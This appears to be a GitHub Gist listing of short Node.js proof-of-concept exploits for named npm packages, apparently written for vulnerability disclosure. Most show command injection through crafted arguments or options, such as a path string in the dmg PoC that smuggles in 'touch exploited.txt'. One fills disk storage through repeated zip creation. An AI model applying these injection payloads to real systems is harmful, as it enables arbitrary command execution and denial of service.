Skip to content

Instantly share code, notes, and snippets.

@mcoimbra
mcoimbra / topenurl-1.1.1_poc.js
Created October 26, 2023 12:01
Package topenurl: when executing the open(url, callback) function, if there is an error reading the URL, it gets handled by a user-provided callback function without any security measure like the node:vm module.
'use strict'
const pkg = require('topenurl');
const callback = function(error) {
const fs = require('node:fs');
let fd = fs.openSync('exploited.txt', 'a');
fs.closeSync(fd);
};
@mcoimbra
mcoimbra / aaptjs_poc.js
Last active October 26, 2023 12:09
Package aaptjs: The aaptjs module's 'add' function can add files to an existing .zip file. It is possible to call it once to create a .zip file and then iteratively create a new .zip from the previous one, eventually filling the file system storage space.
'use strict'
const pkg = require('aaptjs');
/*
* Creates many zip files. After PREV_ZIP_SZ zip files created,
* it starts adding the last PREV_ZIP_SZ zip files to the new one
* rather than just hte previous one.
@mcoimbra
mcoimbra / authenio-xsd-schema-validator-0.7.3_poc.js
Last active October 26, 2023 12:26
Package authenio-xsd-schema-validator: The error handling of the Validator.prototype.validateXML call is delegated to a callback function provided by the user, through which I was able to create a local 'exploit.txt' file.
'use strict'
const pkg = require('@authenio/xsd-schema-validator');
process.env.JAVA_HOME = 'touch';
const xml = '';
const schema = '';
const callback = function(err, result) {
const fs = require('node:fs');
@mcoimbra
mcoimbra / check-dependencies-1.1.0_poc.js
Created October 26, 2023 16:31
Package check-dependencies: command injection is possible through a series of argument manipulations and by writing locally to a file and directory.
'use strict'
const fs = require('node:fs');
const path = require('node:path');
const cwd = process.cwd();
/*
* Create a local 'bower.json' file so that the program flow can
* continue within the pkg.sync call below.
@mcoimbra
mcoimbra / chromedriver-115.0.1_poc.js
Created October 26, 2023 17:02
Package chromedriver: possible to do command injection by manipulating the arguments.
'use strict'
const chromedriver = require('chromedriver');
const args = ['exploited.txt'];
const returnPromise = false;
chromedriver.path = '/usr/bin/touch';
// This creates a local 'exploited.txt' file.
@mcoimbra
mcoimbra / dmg-0.1.0_poc.js
Created October 26, 2023 18:03
Package dmg: it is possible to perform command injection by manipulating the 'path' argument which supposedly would contain a valid path to a .dmg file.
'use strict'
const dmg = require('dmg');
const path = '" | touch exploited.txt | echo /Volumes/ "';
const callback = function() {};
dmg.unmount(path, callback);
@mcoimbra
mcoimbra / editor-1.0.0_poc.js
Created October 26, 2023 18:31
Package editor: the user is able to inject a binary to be executed.
'use strict'
const editor = require('editor');
const file = 'exploited.txt';
const opts = {
editor: 'touch'
};
const cb = function() {};
@mcoimbra
mcoimbra / cross-conf-env-1.3.0_poc.js
Created October 26, 2023 21:07
Package cross-conf-env: Possible to inject code in the argument of the package's exported function crossConfEnv
'use strict'
const pkg = require('cross-conf-env');
// This will create a local 'exploit.txt' file.
pkg.default(['touch', 'exploit.txt']);
@mcoimbra
mcoimbra / cross-os-1.5.0_poc.js
Created October 26, 2023 21:24
Package cross-os: Spawn is called (#45) and it is possible to manipulate the binary and arguments passed to it via the local pacakge.json.
'use strict'
const pkg = require('cross-os');
@mcoimbra
mcoimbra / git-promise-1.0.0_poc.js
Created October 28, 2023 15:16
Package git-promise: it is possible through the argument to execute a binary which is not 'git', with the package README.md focusing only on running git commands.
'use strict'
const pkg = require('git-promise');
const commandOrArgs = 'exploited.txt';
const optionsOrCallback = {
gitExec: 'touch'
};
const callbackMaybe = function() {};